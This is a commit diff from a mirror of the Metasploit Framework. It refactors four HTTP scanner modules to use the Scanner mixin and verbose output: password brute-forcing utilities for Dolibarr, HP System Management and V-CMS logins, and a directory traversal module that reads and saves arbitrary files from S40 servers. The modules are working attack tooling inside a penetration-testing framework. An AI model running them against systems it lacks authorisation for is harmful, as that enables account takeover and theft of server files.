infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

modules living inside scanner should include the Scanner mixin

bug/bundler_fix
jvazquez-r7 2014-06-12 12:20:44 -05:00
parent 67d4097e1d
commit e85f829ee4
4 changed files with 39 additions and 23 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

15
modules/auxiliary/scanner/http/dolibarr_login.rb
View File

@ -10,6 +10,7 @@ class Metasploit3 < Msf::Auxiliary
include Msf::Auxiliary::Report include Msf::Auxiliary::Report
include Msf::Exploit::Remote::HttpClient include Msf::Exploit::Remote::HttpClient
include Msf::Auxiliary::AuthBrute include Msf::Auxiliary::AuthBrute
include Msf::Auxiliary::Scanner
def initialize(info = {}) def initialize(info = {})
super(update_info(info, super(update_info(info,
@ -39,7 +40,7 @@ class Metasploit3 < Msf::Auxiliary
def get_sid_token def get_sid_token
res = send_request_raw({ res = send_request_raw({
'method' => 'GET', 'method' => 'GET',
'uri' => normalize_uri(@uri.path) 'uri' => normalize_uri(@uri)
}) })
return [nil, nil] if res.nil? || res.get_cookies.empty? return [nil, nil] if res.nil? || res.get_cookies.empty?
@ -62,7 +63,7 @@ class Metasploit3 < Msf::Auxiliary
# #
sid, token = get_sid_token sid, token = get_sid_token
if sid.nil? or token.nil? if sid.nil? or token.nil?
print_error("#{peer} - Unable to obtain session ID or token, cannot continue") vprint_error("#{peer} - Unable to obtain session ID or token, cannot continue")
return :abort return :abort
else else
vprint_status("#{peer} - Using sessiond ID: #{sid}") vprint_status("#{peer} - Using sessiond ID: #{sid}")
@ -72,7 +73,7 @@ class Metasploit3 < Msf::Auxiliary
begin begin
res = send_request_cgi({ res = send_request_cgi({
'method' => 'POST', 'method' => 'POST',
'uri' => normalize_uri("#{@uri.path}index.php"), 'uri' => normalize_uri("#{@uri}index.php"),
'cookie' => sid, 'cookie' => sid,
'vars_post' => { 'vars_post' => {
'token' => token, 'token' => token,
@ -91,7 +92,7 @@ class Metasploit3 < Msf::Auxiliary
end end
if res.nil? if res.nil?
print_error("#{peer} - Connection timed out") vprint_error("#{peer} - Connection timed out")
return :abort return :abort
end end
@ -116,8 +117,12 @@ class Metasploit3 < Msf::Auxiliary
def run def run
@uri = target_uri.path @uri = target_uri.path
@uri.path << "/" if @uri.path[-1, 1] != "/" @uri << "/" if @uri[-1, 1] != "/"
super
end
def run_host(ip)
each_user_pass { |user, pass| each_user_pass { |user, pass|
vprint_status("#{peer} - Trying \"#{user}:#{pass}\"") vprint_status("#{peer} - Trying \"#{user}:#{pass}\"")
do_login(user, pass) do_login(user, pass)

7
modules/auxiliary/scanner/http/hp_sys_mgmt_login.rb
View File

@ -10,6 +10,7 @@ class Metasploit3 < Msf::Auxiliary
include Msf::Auxiliary::Report include Msf::Auxiliary::Report
include Msf::Exploit::Remote::HttpClient include Msf::Exploit::Remote::HttpClient
include Msf::Auxiliary::AuthBrute include Msf::Auxiliary::AuthBrute
include Msf::Auxiliary::Scanner
def initialize(info={}) def initialize(info={})
super(update_info(info, super(update_info(info,
@ -55,11 +56,11 @@ class Metasploit3 < Msf::Auxiliary
}) })
if not res if not res
print_error("#{peer} - Connection timed out") vprint_error("#{peer} - Connection timed out")
return :abort return :abort
end end
rescue ::Rex::ConnectionError, Errno::ECONNREFUSED rescue ::Rex::ConnectionError, Errno::ECONNREFUSED
print_error("#{peer} - Failed to response") vprint_error("#{peer} - Failed to response")
return :abort return :abort
end end
@ -79,7 +80,7 @@ class Metasploit3 < Msf::Auxiliary
end end
def run def run_host(ip)
if anonymous_access? if anonymous_access?
print_status("#{peer} - No login necessary. Server allows anonymous access.") print_status("#{peer} - No login necessary. Server allows anonymous access.")
return return

14
modules/auxiliary/scanner/http/s40_traversal.rb
View File

@ -8,6 +8,7 @@ require 'msf/core'
class Metasploit3 < Msf::Auxiliary class Metasploit3 < Msf::Auxiliary
include Msf::Exploit::Remote::HttpClient include Msf::Exploit::Remote::HttpClient
include Msf::Auxiliary::Scanner
def initialize(info = {}) def initialize(info = {})
super(update_info(info, super(update_info(info,
@ -41,13 +42,13 @@ class Metasploit3 < Msf::Auxiliary
], self.class) ], self.class)
end end
def run def run_host(ip)
uri = target_uri.path uri = target_uri.path
uri << '/' if uri[-1, 1] != '/' uri << '/' if uri[-1, 1] != '/'
t = "/.." * datastore['DEPTH'] t = "/.." * datastore['DEPTH']
print_status("Retrieving #{datastore['FILE']}") vprint_status("#{peer} - Retrieving #{datastore['FILE']}")
# No permission to access.log or proc/self/environ, so this is all we do :-/ # No permission to access.log or proc/self/environ, so this is all we do :-/
uri = normalize_uri(uri, 'index.php') uri = normalize_uri(uri, 'index.php')
@ -57,13 +58,14 @@ class Metasploit3 < Msf::Auxiliary
}) })
if not res if not res
print_error("Server timed out") vprint_error("#{peer} - Server timed out")
elsif res and res.body =~ /Error 404 requested page cannot be found/ elsif res and res.body =~ /Error 404 requested page cannot be found/
print_error("Either the file doesn't exist, or you don't have the permission to get it") vprint_error("#{peer} - Either the file doesn't exist, or you don't have the permission to get it")
else else
# We don't save the body by default, because there's also other junk in it. # We don't save the body by default, because there's also other junk in it.
# But we still have a SAVE option just in case # But we still have a SAVE option just in case
print_line(res.body) print_good("#{peer} - #{datastore['FILE']} retrieved")
vprint_line(res.body)
if datastore['SAVE'] if datastore['SAVE']
p = store_loot( p = store_loot(
@ -73,7 +75,7 @@ class Metasploit3 < Msf::Auxiliary
res.body, res.body,
::File.basename(datastore['FILE']) ::File.basename(datastore['FILE'])
) )
print_status("File saved as: #{p}") print_good("#{peer} - File saved as: #{p}")
end end
end end
end end

26
modules/auxiliary/scanner/http/vcms_login.rb
View File

@ -10,14 +10,15 @@ class Metasploit3 < Msf::Auxiliary
include Msf::Auxiliary::Report include Msf::Auxiliary::Report
include Msf::Exploit::Remote::HttpClient include Msf::Exploit::Remote::HttpClient
include Msf::Auxiliary::AuthBrute include Msf::Auxiliary::AuthBrute
include Msf::Auxiliary::Scanner
def initialize(info = {}) def initialize(info = {})
super(update_info(info, super(update_info(info,
'Name' => 'V-CMS Login Utility', 'Name' => 'V-CMS Login Utility',
'Description' => %q{ 'Description' => %q{
This module attempts to authenticate to an English-based V-CMS login interface. This module attempts to authenticate to an English-based V-CMS login interface. It
It should only work against version v1.1 or older, because these versions do not should only work against version v1.1 or older, because these versions do not have
have any default protections against bruteforcing. any default protections against bruteforcing.
}, },
'Author' => [ 'sinn3r' ], 'Author' => [ 'sinn3r' ],
'License' => MSF_LICENSE 'License' => MSF_LICENSE
@ -31,7 +32,7 @@ class Metasploit3 < Msf::Auxiliary
File.join(Msf::Config.data_directory, "wordlists", "http_default_users.txt") ]), File.join(Msf::Config.data_directory, "wordlists", "http_default_users.txt") ]),
OptPath.new('PASS_FILE', [ false, "File containing passwords, one per line", OptPath.new('PASS_FILE', [ false, "File containing passwords, one per line",
File.join(Msf::Config.data_directory, "wordlists", "http_default_pass.txt") ]), File.join(Msf::Config.data_directory, "wordlists", "http_default_pass.txt") ]),
OptString.new('TARGETURI', [true, 'The URI path to dolibarr', '/vcms2/']) OptString.new('TARGETURI', [true, 'The URI path to V-CMS', '/vcms2/'])
], self.class) ], self.class)
end end
@ -39,7 +40,7 @@ class Metasploit3 < Msf::Auxiliary
def get_sid def get_sid
res = send_request_raw({ res = send_request_raw({
'method' => 'GET', 'method' => 'GET',
'uri' => @uri.path 'uri' => @uri
}) })
# Get the PHP session ID # Get the PHP session ID
@ -52,6 +53,11 @@ class Metasploit3 < Msf::Auxiliary
def do_login(user, pass) def do_login(user, pass)
begin begin
sid = get_sid sid = get_sid
if sid.nil?
vprint_error("#{peer} - Failed to get sid")
return :abort
end
res = send_request_cgi({ res = send_request_cgi({
'uri' => "#{@uri}process.php", 'uri' => "#{@uri}process.php",
'method' => 'POST', 'method' => 'POST',
@ -62,9 +68,7 @@ class Metasploit3 < Msf::Auxiliary
'sublogin' => '1' 'sublogin' => '1'
} }
}) })
location = res.headers['Location'] location = res.headers['Location']
res = send_request_cgi({ res = send_request_cgi({
'uri' => location, 'uri' => location,
'method' => 'GET', 'method' => 'GET',
@ -87,7 +91,7 @@ class Metasploit3 < Msf::Auxiliary
return :skip_user return :skip_user
when /Invalid password/ when /Invalid password/
vprint_status("#{peer} - Username found: #{user}") vprint_status("#{peer} - Username found: #{user}")
else /\<a href="process\.php\?logout=1"\>/ when /\<a href="process\.php\?logout=1"\>/
print_good("#{peer} - Successful login: \"#{user}:#{pass}\"") print_good("#{peer} - Successful login: \"#{user}:#{pass}\"")
report_auth_info({ report_auth_info({
:host => rhost, :host => rhost,
@ -107,8 +111,12 @@ class Metasploit3 < Msf::Auxiliary
def run def run
@uri = normalize_uri(target_uri.path) @uri = normalize_uri(target_uri.path)
@uri.path << "/" if @uri.path[-1, 1] != "/" @uri << "/" if @uri[-1, 1] != "/"
super
end
def run_host(ip)
each_user_pass { |user, pass| each_user_pass { |user, pass|
vprint_status("#{peer} - Trying \"#{user}:#{pass}\"") vprint_status("#{peer} - Trying \"#{user}:#{pass}\"")
do_login(user, pass) do_login(user, pass)